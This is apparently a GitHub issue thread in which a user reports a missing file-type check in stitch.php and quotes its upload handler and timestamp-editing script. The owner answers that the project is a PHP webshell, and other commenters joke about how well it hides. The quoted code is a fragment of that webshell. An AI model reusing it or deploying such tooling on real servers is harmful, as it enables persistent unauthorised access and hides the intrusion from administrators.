Open tianxiabingmadadudu opened 1 year ago
in the file stitch.php, on line number 1467. There is no file suffix filtering. You can upload PHP files. File upload vulnerability!
$file_name = isset($_FILES['upfile']['name']) ? $_FILES['upfile']['name'] : ""; $name = isset($GLOBALS['_GET']['name']) ? Decrypt::run($GLOBALS['_GET']['name']) : ""; $pp = urlencode(dirname($this->p)); $result = <<<EOF <script> function utf16to8(str) {var out, i, len, c;out = "";len = str.length;for(i = 0; i < len; i++) {c = str.charCodeAt(i);if ((c >= 0x0001) && (c <= 0x007F)) {out += str.charAt(i);} else if (c > 0x07FF) {out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));} else {out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));}}return out;} function utf8to16(str) {var out, i, len, c;var char2, char3;out = "";len = str.length;i = 0;while(i < len) {c = str.charCodeAt(i++);switch(c >> 4) {case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:out += str.charAt(i-1);break;case 12: case 13:char2 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));break;case 14:char2 = str.charCodeAt(i++);char3 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x0F) << 12) |((char2 & 0x3F) << 6) |((char3 & 0x3F) << 0));break;}}return out;} function CheckDate(){var re = document.getElementById('mtime').value;var reg = /^\d{1,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}$/;var r = re.match(reg);var t = document.getElementById('charset').value;t = t.toLowerCase();if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}if(t=="gbk" || t=="gb2312"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}}document.getElementById('editor').submit();} </script> EOF; if (!empty($GLOBALS['_POST']['upload'])) { $message_name = $file_name . ' ' . $this->msg[2]; $content = @copy($_FILES['upfile']['tmp_name'] , str_replace('//' , '/' , $this->p . '/' . $file_name)) ? $message_name : $this->msg[3]; $url = "?action=wjdc&path=" . base64_encode($this->p); HtmlOutput::tips($content , $url); }
兄弟,你看好了,我这是个 PHP 大马
笑死我了草,在大马下面找漏洞
年度笑话
蚌埠住了哈哈哈🤣 项目挺不错的,居然能让别人看不出来这是PHP代码
in the file stitch.php, on line number 1467. There is no file suffix filtering. You can upload PHP files. File upload vulnerability!